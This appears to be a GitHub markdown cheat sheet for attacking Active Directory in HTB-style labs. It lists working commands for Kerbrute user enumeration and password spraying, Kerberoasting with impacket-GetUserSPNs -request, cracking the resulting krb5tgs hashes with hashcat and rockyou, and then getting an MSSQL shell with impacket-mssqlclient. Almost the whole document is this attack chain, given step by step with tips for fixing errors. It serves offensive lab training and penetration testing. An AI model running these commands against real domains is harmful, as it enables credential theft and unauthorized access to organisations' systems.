Skip to content

Latest commit

 

History

History
128 lines (84 loc) · 2.86 KB

cheat-sheet.md

File metadata and controls

128 lines (84 loc) · 2.86 KB

Cheat Sheet

Kerbrute

Enumerating Valid Users w/ Kerbrute

  1. Place potentially valid users into a users.txt file

2. Execute Userenum:

./kerbrute userenum -d htb.local --dc hostname_or_IP_of_DC users.txt

Password Spray

  1. Gather valid usernames
  2. Execute userenum
  3. Passwordspray:
./kerbrute passwordspray --dc hostname_or_IP_of_DC -d htb.local users.txt <password_here>

Impacket

Generate Kerberos TGT w/ Impacket-GetTGT

Generate TGT:

impacket-getTGT domain/user:password
  • This will save the ticket as <username>.ccache

Export KRB5CCNAME so that Impacket will use it:

export KRB5CCNAME=user.ccache

klist

Ticket cahce: FILE: <username.ccache>
Default principal: username@domain

Valid Starting        Expires            Service Principal
MM/DD/YYYY TIME       MM/DD/YYYY TIME    krbtgt/domain@domain
        renew until MM/DD/YYYY TIME

Kerberoasting w/ Impacket-GetUserSPNs

impacket-GetUserSPNs domain/user:password -dc-ip hostname_or_ip_of_dc -k

Password: Enter_password_here

no-pass option:

impacket-GetUserSPNs domain/user:password -dc-ip hostname_or_ip_of_dc -k -no-pass
  • Be sure to utilize the -request option if you want a hash
  • Without it, you will only validate access to an SPN
  • Which is helpful, but what we're really after is a hash
impacket-GetUserSPNs domain/user:password -dc-ip hostname_or_ip_of_dc -k -request

Getting an error?

  • "The SMB request is not supported. Probably NTLM is disabled."
  • You may be able to fix this with the -dc-host option rather than -dc-ip
impacket-GetUserSPNs domain/user:password -dc-host hostname_or_ip_of_dc -k

no-pass option:

impacket-GetUserSPNs domain/user:password -dc-host hostname_or_ip_of_dc -k -no-pass

Requesting hash:

  • The -request option is required in order to obtain a hash
impacket-GetUserSPNs domain/user:password -dc-host hostname_or_ip_of_dc -k -no-pass -request

Cracking krb5tgs Hash

  1. Copy hash from the GetUserSPNs output
  2. Place in a file called hashes.txt
  3. If you utilize the latest version of hashcat, it will automatically detect the type of hash
  4. Crack:
hashcat hashes.txt /usr/share/wordlist/rockyou.txt

5. View password:

hashcat hashes.txt --show

Authenticating to svc_mssql w/ Impacket-mssqlclient

  • Did you get a SPN for svc_mssql or something similar?
  • You may be able to utilize valid credentials to gain a shell to mssql!

Impacket-mssqlclient:

impacket-mssqlclient domain.local -k
  • -k specifies usage of Kerberos